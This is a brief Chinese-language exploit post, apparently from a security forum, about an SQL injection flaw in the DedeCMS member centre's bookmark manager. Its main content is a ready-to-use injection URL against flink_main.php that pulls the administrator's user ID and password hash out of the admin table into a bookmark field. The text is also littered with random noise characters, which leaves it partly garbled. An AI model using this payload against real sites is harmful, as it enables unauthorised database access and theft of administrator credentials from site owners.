DedeCMS会员中心SQL注射漏洞# \" T; @! t/ e9 c8 g1 _7 B
需要magic_quotes_gpc = Off7 t. o4 {, c8 t/ z
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.5 A1 J; b! D- K' s- d% C3 E
. _" t+ P0 u* ~! v% K W; aDedeCMS会员中心书签管理SQL注射漏洞
, ]$ S+ o3 C+ O) N# e+ c成功利用该漏洞可获得管理员密码
- A1 k- H1 F& u3 M- j; U8 [. y6 p
9 x, j" C9 Y' N' G会员登录后可以执行SQL语句查询数据库任意内容如管理员密码4 P6 I& ?* i- L/ s1 q" Q, |
/ d3 [" ^( C4 ohttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r# g2 \7 n% |# ]6 Z1 H9 o% L
|